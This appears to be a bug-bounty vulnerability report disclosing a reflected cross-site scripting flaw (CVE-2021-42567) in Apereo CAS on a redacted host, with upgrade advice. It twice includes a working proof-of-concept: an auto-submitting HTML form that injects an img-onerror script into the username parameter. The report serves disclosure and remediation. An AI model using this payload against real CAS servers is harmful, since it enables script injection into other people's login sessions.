CVE-2021-42567 - Apereo CAS Reflected XSS on https://█████████

Apereo CAS through 6.4.1 allows XSS via POST requests sent to the REST API endpoints. CAS is vulnerable to a Reflected Cross-Site Scripting attack, via POST requests sent to the REST API endpoints. The payload could be injected on URLs: /███████/. Malicious scripts can be submitted to CAS via parameters such as the ticket id or the username. That results in CAS rejecting the request and producing a response in which the value of the vulnerable parameter is echoed back, resulting in its execution. VULNERABLE SITE: https://██████████ VULNERABLE ENDPOINT: https://███████/█████████/ PROOF OF CONCEPT: ----------------------- * It seems easy as you just need to drop the XSS payload inside the parameter "username" or at the end of the endpoint's path (in URL-encoded form, of course). Apereo CAS rejects the request and echoed back the ticket's ID or the username in the HTTP response without sanitizing. <html> <body onload="document.forms[0].submit()"> <form action="https://█████████/████████/" method="POST"> <input type="hidden" name="username" value="<img/src/onerror=alert(document.domain)>" /> <input type="hidden" name="password" value="Mellon" /> </form> </body> </html> * Save the above HTML code as xss.html * Open it on the browser * You can notice that the XSS is triggered via a POST request. ## Impact Apereo CAS through 6.4.1 allows XSS via POST requests sent to the REST API endpoints. REFERENCES : --------------- * https://apereo.github.io/2021/10/18/restvuln/ * https://www.sudokaikan.com/2021/12/exploit-cve-2021-42567-post-based-xss.html * https://github.com/sudohyak/exploit/blob/dcf04f704895fe7e042a0cfe9c5ead07797333cc/CVE-2021-42567/README.md * https://nvd.nist.gov/vuln/detail/CVE-2021-42567 * https://github.com/apereo/cas/releases Best Regards, 3th1c_yuk1 ## System Host(s) █████████ ## Affected Product(s) and Version(s) Apereo CAS ## CVE Numbers CVE-2021-42567 ## Steps to Reproduce * It seems easy as you just need to drop the XSS payload inside the parameter "username" or at the end of the endpoint's path (in URL-encoded form, of course). Apereo CAS rejects the request and echoed back the ticket's ID or the username in the HTTP response without sanitizing. <html> <body onload="document.forms[0].submit()"> <form action="https://██████/██████████/" method="POST"> <input type="hidden" name="username" value="<img/src/onerror=alert(document.domain)>" /> <input type="hidden" name="password" value="Mellon" /> </form> </body> </html> * Save the above HTML code as xss.html * Open it on the browser * You can notice that the XSS is triggered via a POST request. ## Suggested Mitigation/Remediation Actions You should check the server's version and update to ... not the versions 6.3.7.1 and 6.4.2, but the versions 6.3.7.4 and 6.4.4.2 to mitigate this XSS.